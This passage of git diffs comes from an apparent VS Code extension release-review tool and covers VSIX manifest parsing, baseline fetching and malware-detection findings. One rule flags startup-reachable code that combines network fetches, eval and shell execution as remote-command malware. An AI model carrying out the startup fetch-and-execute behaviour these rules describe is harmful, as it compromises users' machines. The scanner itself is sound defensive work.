   if (!broadActivation) return null;
-  const entrypoint = entrypointFile(manifest, files);
-  if (!entrypoint?.textSample) return null;
-  const sample = entrypoint.textSample;
-  const normalized = normalizeCodeForScanning(sample);
-  const processExecution = matches(JS_PATTERN_SET.processExecution, sample, normalized);
-  const networkAccess = matches(JS_PATTERN_SET.networkAccess, sample, normalized);
-  const dynamicEvaluation = matches(JS_PATTERN_SET.dynamicEvaluation, sample, normalized);
-  if (!processExecution || !networkAccess || !dynamicEvaluation) return null;
-  return vscodeTag("startupRemoteCommand", {
-    severity: "critical",
-    file: entrypoint.path,
-    line: firstMatchingLine(sample, [
-      ...JS_PATTERN_SET.processExecution,
-      ...JS_PATTERN_SET.networkAccess,
-      ...JS_PATTERN_SET.dynamicEvaluation,
-    ]),
-    evidence: `startup activation ${broadActivation} reaches network + decode/eval + process execution`,
-    reason:
-      "remote-command VS Code malware commonly activates on startup, fetches or decodes operator-controlled payloads, and executes shell commands",
-  });
+  for (const entrypoint of entrypointFiles(manifest, files)) {
+    if (!entrypoint.textSample) continue;
+    const sample = entrypoint.textSample;
+    const normalized = normalizeCodeForScanning(sample);
+    const processExecution = matches(JS_PATTERN_SET.processExecution, sample, normalized);
+    const networkAccess = matches(JS_PATTERN_SET.networkAccess, sample, normalized);
+    const dynamicEvaluation = matches(JS_PATTERN_SET.dynamicEvaluation, sample, normalized);
+    if (!processExecution || !networkAccess || !dynamicEvaluation) continue;
+    return vscodeTag("startupRemoteCommand", {
+      severity: "critical",
+      file: entrypoint.path,
+      line: firstMatchingLine(sample, [
+        ...JS_PATTERN_SET.processExecution,
+        ...JS_PATTERN_SET.networkAccess,
+        ...JS_PATTERN_SET.dynamicEvaluation,
+      ]),
+      evidence: `startup activation ${broadActivation} reaches network + decode/eval + process execution`,
+      reason:
+        "remote-command VS Code malware commonly activates on startup, fetches or decodes operator-controlled payloads, and executes shell commands",
+    });
+  }
+  return null;
 }
 
 function undeclaredConfigurationReadFindings(
@@ -271,13 +273,6 @@ function isDeclaredConfigurationKey(key: string, declared: Set<string>): boolean
 function isCommonConfigurationKey(key: string): boolean {
   const namespace = key.split(".")[0];
   return COMMON_VSCODE_CONFIGURATION_NAMESPACES.has(namespace);
-}
-
-function entrypointFile(
-  manifest: Pick<VscodeExtensionManifest, "main" | "browser">,
-  files: AcquiredArtifact["files"],
-) {
-  return entrypointFiles(manifest, files)[0] ?? null;
 }
 
 function entrypointFiles(

--- a/server/lib/adapters/vscode/findings.ts
+++ b/server/lib/adapters/vscode/findings.ts
@@ -250,9 +250,12 @@ function readConfigurationKeys(sample: string): string[] {
   const keys = new Set<string>();
   const chained =
     /(?:vscode\.)?workspace\.getConfiguration\s*\(\s*["']([^"']+)["']\s*\)\s*\.get\s*\(\s*["']([^"']+)["']/g;
+  const unscoped =
+    /(?:vscode\.)?workspace\.getConfiguration\s*\(\s*\)\s*\.get\s*\(\s*["']([^"']+\.[^"']+)["']/g;
   const direct = /(?:vscode\.)?workspace\.getConfiguration\s*\(\s*["']([^"']+\.[^"']+)["']\s*\)/g;
   let match: RegExpExecArray | null;
   while ((match = chained.exec(sample))) keys.add(`${match[1]}.${match[2]}`);
+  while ((match = unscoped.exec(sample))) keys.add(match[1]);
   while ((match = direct.exec(sample))) keys.add(match[1]);
   return [...keys].sort();
 }
@@ -260,9 +263,9 @@ function readConfigurationKeys(sample: string): string[] {
 function configurationKeyLinePattern(key: string): RegExp {
   const [namespace, leaf] = key.split(/\.(.*)/s);
   return new RegExp(
-    `workspace\\.getConfiguration\\s*\\(\\s*["']${escapeRegExp(namespace)}(?:\\.${escapeRegExp(
+    `workspace\\.getConfiguration\\s*\\(\\s*(?:["']${escapeRegExp(namespace)}(?:\\.${escapeRegExp(
       leaf ?? "",
-    )})?["']`,
+    )})?["']|\\)\\s*\\.get\\s*\\(\\s*["']${escapeRegExp(key)}["'])`,
   );
 }
 

--- a/server/lib/adapters/vscode/findings.ts
+++ b/server/lib/adapters/vscode/findings.ts
@@ -54,6 +54,22 @@ const WASM_LOADER_PATTERNS = [
   /\bgo\.run\s*\(/,
   /\bwasm_exec(?:\.js)?\b/,
 ];
+const RELATIVE_SPECIFIER_PATTERNS = [
+  /\brequire\s*\(\s*["'](\.\.?\/[^"'\n]+)["']\s*\)/g,
+  /\bimport\s*\(\s*["'](\.\.?\/[^"'\n]+)["']\s*\)/g,
+  /\b(?:import|export)\s+[^"'\n]*?from\s+["'](\.\.?\/[^"'\n]+)["']/g,
+  /\b(?:import|export)\s+["'](\.\.?\/[^"'\n]+)["']/g,
+];
+const MODULE_RESOLUTION_SUFFIXES = [
+  "",
+  ".js",
+  ".mjs",
+  ".cjs",
+  ".json",
+  "/index.js",
+  "/index.mjs",
+  "/index.cjs",
+];
 
 export function buildVscodeFindings(args: {
   staged: AcquiredArtifact;
@@ -161,9 +177,9 @@ function startupRemoteCommandFinding(
   broadActivation: string | null,
 ): Finding | null {
   if (!broadActivation) return null;
-  for (const entrypoint of entrypointFiles(manifest, files)) {
-    if (!entrypoint.textSample) continue;
-    const sample = entrypoint.textSample;
+  for (const reachable of startupReachableFiles(manifest, files)) {
+    if (!reachable.textSample) continue;
+    const sample = reachable.textSample;
     const normalized = normalizeCodeForScanning(sample);
     const processExecution = matches(JS_PATTERN_SET.processExecution, sample, normalized);
     const networkAccess = matches(JS_PATTERN_SET.networkAccess, sample, normalized);
@@ -171,7 +187,7 @@ function startupRemoteCommandFinding(
     if (!processExecution || !networkAccess || !dynamicEvaluation) continue;
     return vscodeTag("startupRemoteCommand", {
       severity: "critical",
-      file: entrypoint.path,
+      file: reachable.path,
       line: firstMatchingLine(sample, [
         ...JS_PATTERN_SET.processExecution,
         ...JS_PATTERN_SET.networkAccess,
@@ -216,7 +232,7 @@ function startupWasmLoaderFinding(
   broadActivation: string | null,
 ): Finding | null {
   if (!broadActivation || !hasWasmArtifact(files)) return null;
-  const loader = entrypointFiles(manifest, files).find(
+  const loader = startupReachableFiles(manifest, files).find(
     (file) => isJavaScriptFile(file.path) && isWasmLoader(file.textSample),
   );
   if (!loader?.textSample) return null;
@@ -278,22 +294,36 @@ function isCommonConfigurationKey(key: string): boolean {
   return COMMON_VSCODE_CONFIGURATION_NAMESPACES.has(namespace);
 }
 
-function entrypointFiles(
+function startupReachableFiles(
   manifest: Pick<VscodeExtensionManifest, "main" | "browser">,
   files: AcquiredArtifact["files"],
 ) {
-  const candidates = [
+  const byPath = new Map(files.map((file) => [file.path, file]));
+  const queue = [
     ...entrypointCandidates(manifest.main),
     ...entrypointCandidates(manifest.browser),
-  ];
+  ].flatMap((path) => {
+    const resolved = resolveModulePath(path, byPath);
+    return resolved ? [resolved] : [];
+  });
+  const reachable: AcquiredArtifact["files"] = [];
   const seen = new Set<string>();
-  return candidates
-    .map((path) => files.find((file) => file.path === path))
-    .filter((file): file is AcquiredArtifact["files"][number] => {
-      if (!file || seen.has(file.path)) return false;
-      seen.add(file.path);
-      return true;
-    });
+
+  while (queue.length) {
+    const path = queue.shift();
+    if (!path || seen.has(path)) continue;
+    seen.add(path);
+    const file = byPath.get(path);
+    if (!file) continue;
+    reachable.push(file);
+    if (!file.textSample) continue;
+    for (const specifier of relativeSpecifiers(file.textSample)) {
+      const resolved = resolveModulePath(joinRelative(path, specifier), byPath);
+      if (resolved && !seen.has(resolved)) queue.push(resolved);
+    }
+  }
+
+  return reachable;
 }
 
 function entrypointCandidates(path: string | null): string[] {
@@ -303,6 +333,47 @@ function entrypointCandidates(path: string | null): string[] {
   if (!/\.[cm]?js$/i.test(normalized))
     out.push(`${normalized}.js`, `${normalized}.cjs`, `${normalized}.mjs`);
   return out;
+}
+
+function relativeSpecifiers(text: string): string[] {
+  const specifiers: string[] = [];
+  for (const pattern of RELATIVE_SPECIFIER_PATTERNS) {
+    pattern.lastIndex = 0;
+    for (const match of text.matchAll(pattern)) specifiers.push(match[1]);
+  }
+  return specifiers;
+}
+
+function resolveModulePath(
+  candidate: string,
+  byPath: Map<string, AcquiredArtifact["files"][number]>,
+): string | null {
+  const base = normalizePathSegments(candidate.replace(/^\.\//, ""));
+  if (!base) return null;
+  for (const suffix of MODULE_RESOLUTION_SUFFIXES) {
+    const resolved = base + suffix;
+    if (byPath.has(resolved)) return resolved;
+  }
+  return null;
+}
+
+function joinRelative(fromPath: string, specifier: string): string {
+  const directory = fromPath.split("/").slice(0, -1).join("/");
+  return directory ? `${directory}/${specifier}` : specifier;
+}
+
+function normalizePathSegments(path: string): string | null {
+  const out: string[] = [];
+  for (const segment of path.split("/")) {
+    if (!segment || segment === ".") continue;
+    if (segment === "..") {
+      if (!out.length) return null;
+      out.pop();
+      continue;
+    }
+    out.push(segment);
+  }
+  return out.join("/");
 }
 
 function broadActivationEvent(events: string[]): string | null {

--- a/server/lib/adapters/vscode/index.ts
+++ b/server/lib/adapters/vscode/index.ts
@@ -1,0 +1,192 @@
+import {
+  computeRisk,
+  createPackageDiff,
+  redactFindings,
+  summarizePackageJsonDiff,
+} from "../../review";
+import type { AcquiredArtifact, BaselineInfo, PackageAdapter } from "../types";
+import { buildVscodeFindings } from "./findings";
+import {
+  extensionIdFromManifest,
+  normalizeVsixFiles,
+  packageJsonSummaryForVscode,
+  parseVscodeAdapterInput,
+  parseVscodeExtensionManifest,
+} from "./manifest";
+import type {
+  VscodeAdapterDetails,
+  VscodeAdapterInput,
+  VscodeArtifactInput,
+  VscodeReleaseCandidateReview,
+} from "./types";
+
+interface VscodeBroker {
+  dispose(): void;
+}
+
+const vscodeBroker: VscodeBroker = {
+  dispose() {},
+};
+
+export const vscodeAdapter: PackageAdapter<VscodeAdapterInput, VscodeBroker> = {
+  id: "vscode",
+  codePatternSet: "javascript",
+
+  parseInput(raw: unknown): VscodeAdapterInput {
+    return parseVscodeAdapterInput(raw);
+  },
+
+  createBroker() {
+    return vscodeBroker;
+  },
+
+  acquireStaged(_ctx, input) {
+    return Promise.resolve(acquireVscodeArtifact(input.manifest, input.artifact));
+  },
+
+  acquireBaseline(_ctx, input) {
+    if (!input.previousArtifact) {
+      return Promise.resolve({
+        artifact: null,
+        baseline: emptyBaseline("baseline-unavailable"),
+      });
+    }
+    const acquired = acquireVscodeArtifact(input.manifest, input.previousArtifact);
+    return Promise.resolve({
+      artifact: acquired.artifact,
+      baseline: {
+        version: acquired.artifact.manifest?.version ?? null,
+        tag: null,
+        source: "latest-published",
+        distTagVersion: null,
+        reason: "provided-previous-artifact",
+      } satisfies BaselineInfo,
+    });
+  },
+
+  runFindings(args) {
+    return buildVscodeFindings({
+      staged: args.staged,
+      details: args.details as VscodeAdapterDetails,
+      fileDiff: args.fileDiff,
+      manifestDiff: args.manifestDiff,
+      stagedManifestText: args.stagedManifestText,
+    });
+  },
+
+  describe({ staged, details, previous }) {
+    const d = details as VscodeAdapterDetails;
+    return {
+      name: staged.manifest?.name ?? d.manifest.package,
+      stagedVersion: staged.manifest?.version ?? d.manifest.version,
+      stagedTag: null,
+      previousVersion: previous?.manifest?.version ?? null,
+    };
+  },
+
+  summarizeDetails(details) {
+    const d = details as VscodeAdapterDetails;
+    return {
+      manifest: d.manifest,
+      artifact: d.artifact,
+    };
+  },
+};
+
+function acquireVscodeArtifact(
+  releaseManifest: VscodeAdapterInput["manifest"],
+  artifactInput: VscodeArtifactInput,
+): { artifact: AcquiredArtifact; details: VscodeAdapterDetails } {
+  const files = normalizeVsixFiles(artifactInput.files);
+  const { file, manifest } = parseVscodeExtensionManifest(files);
+  const extensionId = extensionIdFromManifest(manifest);
+  return {
+    artifact: {
+      files,
+      manifest: packageJsonSummaryForVscode(manifest),
+    },
+    details: {
+      manifest: releaseManifest,
+      artifact: {
+        path: artifactInput.path,
+        sha256: artifactInput.sha256,
+        extensionId,
+        packageJsonPath: file.path,
+        activationEvents: manifest.activationEvents,
+        main: manifest.main,
+        browser: manifest.browser,
+        extensionDependencies: manifest.extensionDependencies,
+        extensionPack: manifest.extensionPack,
+        configurationProperties: manifest.configurationProperties,
+        enginesVscode: manifest.enginesVscode,
+      },
+    },
+  };
+}
+
+function emptyBaseline(reason: string): BaselineInfo {
+  return {
+    version: null,
+    tag: null,
+    source: "none",
+    distTagVersion: null,
+    reason,
+  };
+}
+
+export function createVscodeExtensionReview(input: {
+  manifest: VscodeAdapterInput["manifest"];
+  artifact: VscodeArtifactInput;
+  previousArtifact?: VscodeArtifactInput;
+}): VscodeReleaseCandidateReview {
+  const adapterInput = vscodeAdapter.parseInput(input);
+  const staged = acquireVscodeArtifact(adapterInput.manifest, adapterInput.artifact);
+  const baseline = adapterInput.previousArtifact
+    ? acquireVscodeArtifact(adapterInput.manifest, adapterInput.previousArtifact)
+    : null;
+  const diff = createPackageDiff(baseline?.artifact.files ?? [], staged.artifact.files);
+  const ruleFindings = redactFindings(
+    vscodeAdapter.runFindings({
+      staged: staged.artifact,
+      baseline: baseline?.artifact ?? null,
+      details: staged.details,
+      fileDiff: diff,
+      manifestDiff: summarizePackageJsonDiff(baseline?.artifact.manifest, staged.artifact.manifest),
+      stagedManifestText:
+        staged.artifact.files.find((file) => file.path === "package.json")?.textSample ?? null,
+    }),
+  );
+  return {
+    ecosystem: "vscode",
+    manifest: adapterInput.manifest,
+    package: {
+      name: staged.artifact.manifest?.name ?? null,
+      version: staged.artifact.manifest?.version ?? null,
+    },
+    fileCount: staged.artifact.files.length,
+    previousFileCount: baseline?.artifact.files.length ?? 0,
+    diff,
+    ruleFindings,
+    risk: computeRisk(ruleFindings),
+  };
+}
+
+export { VSCODE_RELEASE_MANIFEST_SCHEMA, VSCODE_RULE_IDS, VSCODE_RULES_VERSION } from "./types";
+export type {
+  VscodeAdapterDetails,
+  VscodeAdapterInput,
+  VscodeArtifactInput,
+  VscodeExtensionManifest,
+  VscodeReleaseCandidateReview,
+  VscodeReleaseManifest,
+} from "./types";
+export {
+  buildVscodeReleaseManifest,
+  extensionIdFromManifest,
+  inferVscodeArtifactKind,
+  normalizeVsixFiles,
+  packageJsonSummaryForVscode,
+  parseVscodeAdapterInput,
+  parseVscodeExtensionManifest,
+  parseVscodeReleaseManifest,
+} from "./manifest";

--- a/server/lib/adapters/vscode/index.ts
+++ b/server/lib/adapters/vscode/index.ts
@@ -5,6 +5,7 @@ import {
   summarizePackageJsonDiff,
 } from "../../review";
 import type { AcquiredArtifact, BaselineInfo, PackageAdapter } from "../types";
+import { createVscodeBroker, pickVscodeBaselineVersion, type VscodeBroker } from "./broker";
 import { buildVscodeFindings } from "./findings";
 import {
   extensionIdFromManifest,
@@ -20,13 +21,7 @@ import type {
   VscodeReleaseCandidateReview,
 } from "./types";
 
-interface VscodeBroker {
-  dispose(): void;
-}
-
-const vscodeBroker: VscodeBroker = {
-  dispose() {},
-};
+const UNKNOWN_BASELINE_SHA256 = "00".repeat(32);
 
 export const vscodeAdapter: PackageAdapter<VscodeAdapterInput, VscodeBroker> = {
   id: "vscode",
@@ -36,23 +31,62 @@ export const vscodeAdapter: PackageAdapter<VscodeAdapterInput, VscodeBroker> = {
     return parseVscodeAdapterInput(raw);
   },
 
-  createBroker() {
-    return vscodeBroker;
+  createBroker(ctx, ref) {
+    return createVscodeBroker(ctx, ref);
   },
 
   acquireStaged(_ctx, input) {
     return Promise.resolve(acquireVscodeArtifact(input.manifest, input.artifact));
   },
 
-  acquireBaseline(_ctx, input) {
+  async acquireBaseline(_ctx, input, broker) {
     if (!input.previousArtifact) {
-      return Promise.resolve({
-        artifact: null,
-        baseline: emptyBaseline("baseline-unavailable"),
-      });
+      const selected = pickVscodeBaselineVersion(
+        await broker.fetchExtensionVersions(input.manifest.package),
+        input.manifest.version,
+      );
+      if (!selected) {
+        return {
+          artifact: null,
+          baseline: emptyBaseline("no-published-baseline"),
+        };
+      }
+
+      try {
+        const downloaded = await broker.downloadPublicArtifact({ url: selected.url });
+        const acquired = acquireVscodeArtifact(input.manifest, {
+          path: `${input.manifest.package}-${selected.version}.vsix`,
+          sha256: UNKNOWN_BASELINE_SHA256,
+          files: downloaded.files,
+        });
+        if (
+          acquired.artifact.manifest?.name !== input.manifest.package ||
+          acquired.artifact.manifest?.version !== selected.version
+        ) {
+          return {
+            artifact: null,
+            baseline: unavailableBaseline("baseline-identity-mismatch", selected.version),
+          };
+        }
+        return {
+          artifact: acquired.artifact,
+          baseline: {
+            version: selected.version,
+            tag: null,
+            source: "latest-published",
+            distTagVersion: null,
+            reason: selected.reason,
+          } satisfies BaselineInfo,
+        };
+      } catch {
+        return {
+          artifact: null,
+          baseline: unavailableBaseline("baseline-unavailable", selected.version),
+        };
+      }
     }
     const acquired = acquireVscodeArtifact(input.manifest, input.previousArtifact);
-    return Promise.resolve({
+    return {
       artifact: acquired.artifact,
       baseline: {
         version: acquired.artifact.manifest?.version ?? null,
@@ -61,7 +95,7 @@ export const vscodeAdapter: PackageAdapter<VscodeAdapterInput, VscodeBroker> = {
         distTagVersion: null,
         reason: "provided-previous-artifact",
       } satisfies BaselineInfo,
-    });
+    };
   },
 
   runFindings(args) {
@@ -134,6 +168,16 @@ function emptyBaseline(reason: string): BaselineInfo {
   };
 }
 
+function unavailableBaseline(reason: string, version: string): BaselineInfo {
+  return {
+    version,
+    tag: null,
+    source: "latest-published",
+    distTagVersion: null,
+    reason,
+  };
+}
+
 export function createVscodeExtensionReview(input: {
   manifest: VscodeAdapterInput["manifest"];
   artifact: VscodeArtifactInput;
@@ -190,3 +234,14 @@ export {
   parseVscodeExtensionManifest,
   parseVscodeReleaseManifest,
 } from "./manifest";
+export {
+  isAllowedVscodeArtifactUrl,
+  pickVscodeBaselineVersion,
+  vscodeVsixAssetUrl,
+} from "./broker";
+export type {
+  VscodeBroker,
+  VscodeMarketplaceFile,
+  VscodeMarketplaceVersion,
+  VscodePublicArtifactRef,
+} from "./broker";

--- a/server/lib/adapters/vscode/index.ts
+++ b/server/lib/adapters/vscode/index.ts
@@ -4,7 +4,7 @@ import {
   redactFindings,
   summarizePackageJsonDiff,
 } from "../../review";
-import type { AcquiredArtifact, BaselineInfo, PackageAdapter } from "../types";
+import type { AcquiredArtifact, BaselineInfo, PackageAdapter, ReleaseProvenance } from "../types";
 import { createVscodeBroker, pickVscodeBaselineVersion, type VscodeBroker } from "./broker";
 import { buildVscodeFindings } from "./findings";
 import {
@@ -123,6 +123,18 @@ export const vscodeAdapter: PackageAdapter<VscodeAdapterInput, VscodeBroker> = {
     return {
       manifest: d.manifest,
       artifact: d.artifact,
+      provenance: {
+        // A VS Code release is exactly one VSIX; the recomputed digest is the
+        // bytes the publish job uploads to the Marketplace. Mirrors the npm/PyPI
+        // gates so approved VSIX gates carry the same byte-continuity evidence.
+        ecosystem: "vscode",
+        mode: "workflow_gate",
+        artifacts: d.manifest.artifacts.map((artifact) => ({
+          path: artifact.path,
+          kind: artifact.kind,
+          sha256: artifact.sha256,
+        })),
+      } satisfies ReleaseProvenance,
     };
   },
 };

--- a/server/lib/adapters/vscode/manifest.ts
+++ b/server/lib/adapters/vscode/manifest.ts
@@ -1,0 +1,251 @@
+import type { FileRecord, PackageJsonSummary } from "../../review";
+import { safeJson } from "../../review-rules";
+import {
+  VSCODE_RELEASE_MANIFEST_SCHEMA,
+  type VscodeAdapterInput,
+  type VscodeArtifactInput,
+  type VscodeExtensionManifest,
+  type VscodeReleaseManifest,
+} from "./types";
+
+const SAFE_EXTENSION_NAME_RE = /^[a-z0-9][a-z0-9-]{0,127}$/;
+const SAFE_PUBLISHER_RE = /^[A-Za-z0-9][A-Za-z0-9_-]{0,127}$/;
+const SAFE_VERSION_RE = /^[A-Za-z0-9][A-Za-z0-9._+-]{0,127}$/;
+const SHA256_RE = /^[a-f0-9]{64}$/i;
+
+export function inferVscodeArtifactKind(path: string): "vsix" | null {
+  return path.toLowerCase().endsWith(".vsix") ? "vsix" : null;
+}
+
+export function extensionIdFromManifest(
+  manifest: Pick<VscodeExtensionManifest, "publisher" | "name">,
+): string {
+  return `${manifest.publisher}.${manifest.name}`;
+}
+
+export function normalizeVsixFiles(files: FileRecord[]): FileRecord[] {
+  return files
+    .map((file) => {
+      if (!file.path.startsWith("extension/")) return file;
+      const path = file.path.slice("extension/".length);
+      return path ? { ...file, path } : null;
+    })
+    .filter((file): file is FileRecord => file !== null);
+}
+
+export function findVscodeManifestFile(files: FileRecord[]): FileRecord | null {
+  return files.find((file) => file.path === "package.json" && file.textSample) ?? null;
+}
+
+export function parseVscodeExtensionManifest(files: FileRecord[]): {
+  file: FileRecord;
+  manifest: VscodeExtensionManifest;
+} {
+  const file = findVscodeManifestFile(files);
+  if (!file?.textSample) throw new Error("VSIX artifact must include extension/package.json");
+  const raw = safeJson(file.textSample);
+  if (!isRecord(raw)) throw new Error("VSIX extension package.json must be an object");
+  const name = typeof raw.name === "string" ? raw.name.trim() : "";
+  const publisher = typeof raw.publisher === "string" ? raw.publisher.trim() : "";
+  const version = typeof raw.version === "string" ? raw.version.trim() : "";
+  if (!SAFE_EXTENSION_NAME_RE.test(name)) {
+    throw new Error("VSIX package.json name must be lowercase alphanumeric/dash");
+  }
+  if (!SAFE_PUBLISHER_RE.test(publisher)) throw new Error("VSIX package.json publisher is invalid");
+  if (!SAFE_VERSION_RE.test(version)) throw new Error("VSIX package.json version is invalid");
+
+  const engines = isRecord(raw.engines) ? raw.engines : {};
+  const enginesVscode = typeof engines.vscode === "string" ? engines.vscode : null;
+  if (!enginesVscode || enginesVscode.trim() === "*") {
+    throw new Error("VSIX package.json engines.vscode must be constrained");
+  }
+
+  return {
+    file,
+    manifest: {
+      name,
+      publisher,
+      version,
+      displayName: typeof raw.displayName === "string" ? raw.displayName : null,
+      description: typeof raw.description === "string" ? raw.description : null,
+      main: normalizeManifestPath(raw.main),
+      browser: normalizeManifestPath(raw.browser),
+      activationEvents: normalizeStringList(raw.activationEvents),
+      extensionDependencies: normalizeStringList(raw.extensionDependencies),
+      extensionPack: normalizeStringList(raw.extensionPack),
+      configurationProperties: configurationProperties(raw.contributes),
+      enginesVscode,
+      dependencies: normalizeStringRecord(raw.dependencies),
+      devDependencies: normalizeStringRecord(raw.devDependencies),
+      files: normalizeOptionalStringList(raw.files),
+    },
+  };
+}
+
+export function packageJsonSummaryForVscode(manifest: VscodeExtensionManifest): PackageJsonSummary {
+  return {
+    name: extensionIdFromManifest(manifest),
+    version: manifest.version,
+    ...(manifest.dependencies && Object.keys(manifest.dependencies).length
+      ? { dependencies: manifest.dependencies }
+      : {}),
+    ...(manifest.devDependencies && Object.keys(manifest.devDependencies).length
+      ? { devDependencies: manifest.devDependencies }
+      : {}),
+    ...(manifest.files ? { files: manifest.files } : {}),
+    ...(manifest.main ? { main: manifest.main } : {}),
+    ...(manifest.browser ? { exports: { browser: manifest.browser } } : {}),
+  };
+}
+
+export function buildVscodeReleaseManifest(
+  extensionId: string,
+  version: string,
+  artifacts: Array<{ path: string; sha256: string }>,
+): VscodeReleaseManifest {
+  return parseVscodeReleaseManifest({
+    schema: VSCODE_RELEASE_MANIFEST_SCHEMA,
+    ecosystem: "vscode",
+    package: extensionId,
+    version,
+    artifacts,
+  });
+}
+
+export function parseVscodeReleaseManifest(value: unknown): VscodeReleaseManifest {
+  if (!isRecord(value)) throw new Error("manifest must be an object");
+  if (value.schema !== VSCODE_RELEASE_MANIFEST_SCHEMA) {
+    throw new Error(`manifest schema must be ${VSCODE_RELEASE_MANIFEST_SCHEMA}`);
+  }
+  if (value.ecosystem !== "vscode") throw new Error("manifest ecosystem must be vscode");
+  const packageName = String(value.package || "");
+  const version = String(value.version || "");
+  if (!isSafeExtensionId(packageName))
+    throw new Error("manifest package is not a valid VS Code extension id");
+  if (!SAFE_VERSION_RE.test(version)) throw new Error("manifest version is not safe");
+  if (!Array.isArray(value.artifacts) || value.artifacts.length !== 1) {
+    throw new Error("manifest must include exactly one VSIX artifact");
+  }
+
+  const artifact = value.artifacts[0];
+  if (!isRecord(artifact)) throw new Error("artifact must be an object");
+  const path = String(artifact.path || "");
+  if (!isSafeManifestPath(path) || !inferVscodeArtifactKind(path)) {
+    throw new Error("artifact path must be a safe .vsix path");
+  }
+  const sha256 = String(artifact.sha256 || "");
+  if (!SHA256_RE.test(sha256)) throw new Error("artifact sha256 must be a hex SHA-256 digest");
+
+  return {
+    schema: VSCODE_RELEASE_MANIFEST_SCHEMA,
+    ecosystem: "vscode",
+    package: packageName,
+    version,
+    artifacts: [{ path, sha256: sha256.toLowerCase(), kind: "vsix" }],
+  };
+}
+
+export function parseVscodeAdapterInput(raw: unknown): VscodeAdapterInput {
+  if (!isRecord(raw)) throw new Error("VS Code adapter input must be an object");
+  return {
+    manifest: parseVscodeReleaseManifest(raw.manifest ?? raw),
+    artifact: parseVscodeArtifactInput(raw.artifact, "artifact"),
+    previousArtifact:
+      raw.previousArtifact === undefined
+        ? undefined
+        : parseVscodeArtifactInput(raw.previousArtifact, "previousArtifact"),
+  };
+}
+
+function parseVscodeArtifactInput(raw: unknown, field: string): VscodeArtifactInput {
+  if (!isRecord(raw)) throw new Error(`${field} must be an object`);
+  const path = typeof raw.path === "string" ? raw.path : "";
+  if (!isSafeManifestPath(path) || !inferVscodeArtifactKind(path)) {
+    throw new Error(`${field}.path must be a safe .vsix path`);
+  }
+  const sha256 = typeof raw.sha256 === "string" ? raw.sha256 : "";
+  if (!SHA256_RE.test(sha256)) throw new Error(`${field}.sha256 must be a hex SHA-256 digest`);
+  if (!Array.isArray(raw.files)) throw new Error(`${field}.files must be an array`);
+  return {
+    path,
+    sha256: sha256.toLowerCase(),
+    files: raw.files.map((file, index) => parseFileRecord(file, field, index)),
+  };
+}
+
+function parseFileRecord(raw: unknown, field: string, index: number): FileRecord {
+  if (!isRecord(raw)) throw new Error(`${field}.files[${index}] must be an object`);
+  const path = typeof raw.path === "string" ? raw.path : "";
+  const size = typeof raw.size === "number" ? raw.size : 0;
+  const sha256 = typeof raw.sha256 === "string" ? raw.sha256 : "";
+  const flags = Array.isArray(raw.flags)
+    ? raw.flags.filter((flag): flag is string => typeof flag === "string")
+    : [];
+  return {
+    path,
+    size,
+    sha256,
+    flags,
+    ...(typeof raw.textSample === "string" ? { textSample: raw.textSample } : {}),
+  };
+}
+
+function normalizeManifestPath(value: unknown): string | null {
+  if (typeof value !== "string") return null;
+  let path = value.trim();
+  while (path.startsWith("./")) path = path.slice(2);
+  return isSafeManifestPath(path) ? path : null;
+}
+
+function normalizeStringRecord(value: unknown): Record<string, string> {
+  if (!isRecord(value)) return {};
+  const out: Record<string, string> = {};
+  for (const [key, raw] of Object.entries(value)) {
+    if (typeof raw === "string") out[key] = raw;
+  }
+  return out;
+}
+
+function normalizeStringList(value: unknown): string[] {
+  return Array.isArray(value)
+    ? value.filter((item): item is string => typeof item === "string" && item.trim().length > 0)
+    : [];
+}
+
+function normalizeOptionalStringList(value: unknown): string[] | undefined {
+  const list = normalizeStringList(value);
+  return list.length ? list : undefined;
+}
+
+function configurationProperties(contributes: unknown): string[] {
+  if (!isRecord(contributes)) return [];
+  const configuration = contributes.configuration;
+  const configs = Array.isArray(configuration)
+    ? configuration
+    : configuration
+      ? [configuration]
+      : [];
+  const properties = new Set<string>();
+  for (const config of configs) {
+    if (!isRecord(config) || !isRecord(config.properties)) continue;
+    for (const key of Object.keys(config.properties)) properties.add(key);
+  }
+  return [...properties].sort();
+}
+
+function isSafeExtensionId(value: string): boolean {
+  const parts = value.split(".");
+  if (parts.length !== 2) return false;
+  return SAFE_PUBLISHER_RE.test(parts[0]) && SAFE_EXTENSION_NAME_RE.test(parts[1]);
+}
+
+export function isSafeManifestPath(path: string): boolean {
+  if (!path || path.length > 512 || path.includes("\0") || path.includes("\\")) return false;
+  if (path.startsWith("/") || path.startsWith("../") || path.includes("/../")) return false;
+  if (/^[A-Za-z]:/.test(path)) return false;
+  return path.split("/").every((part) => part && part !== "." && part !== "..");
+}
+
+export function isRecord(value: unknown): value is Record<string, unknown> {
+  return typeof value === "object" && value !== null && !Array.isArray(value);
+}

--- a/server/lib/adapters/vscode/manifest.ts
+++ b/server/lib/adapters/vscode/manifest.ts
@@ -26,7 +26,9 @@ export function extensionIdFromManifest(
 export function normalizeVsixFiles(files: FileRecord[]): FileRecord[] {
   return files
     .map((file) => {
-      if (!file.path.startsWith("extension/")) return file;
+      // VSIX ZIPs store the installed extension payload under `extension/`.
+      // Container-level metadata must not shadow payload paths after stripping.
+      if (!file.path.startsWith("extension/")) return null;
       const path = file.path.slice("extension/".length);
       return path ? { ...file, path } : null;
     })

--- a/server/lib/adapters/vscode/manifest.ts
+++ b/server/lib/adapters/vscode/manifest.ts
@@ -43,6 +43,7 @@ export function parseVscodeExtensionManifest(files: FileRecord[]): {
   file: FileRecord;
   manifest: VscodeExtensionManifest;
 } {
+  assertUniqueVscodePaths(files);
   const file = findVscodeManifestFile(files);
   if (!file?.textSample) throw new Error("VSIX artifact must include extension/package.json");
   const raw = safeJson(file.textSample);
@@ -82,6 +83,16 @@ export function parseVscodeExtensionManifest(files: FileRecord[]): {
       files: normalizeOptionalStringList(raw.files),
     },
   };
+}
+
+function assertUniqueVscodePaths(files: FileRecord[]): void {
+  const seen = new Set<string>();
+  for (const file of files) {
+    if (seen.has(file.path)) {
+      throw new Error(`VSIX artifact contains duplicate path ${file.path}`);
+    }
+    seen.add(file.path);
+  }
 }
 
 export function packageJsonSummaryForVscode(manifest: VscodeExtensionManifest): PackageJsonSummary {

--- a/server/lib/adapters/vscode/manifest.ts
+++ b/server/lib/adapters/vscode/manifest.ts
@@ -8,7 +8,9 @@ import {
   type VscodeReleaseManifest,
 } from "./types";
 
-const SAFE_EXTENSION_NAME_RE = /^[a-z0-9][a-z0-9-]{0,127}$/;
+// Case-insensitive to match vsce's own name validation: grandfathered
+// Marketplace extensions keep capitalized names (golang.Go, ms-vscode.PowerShell).
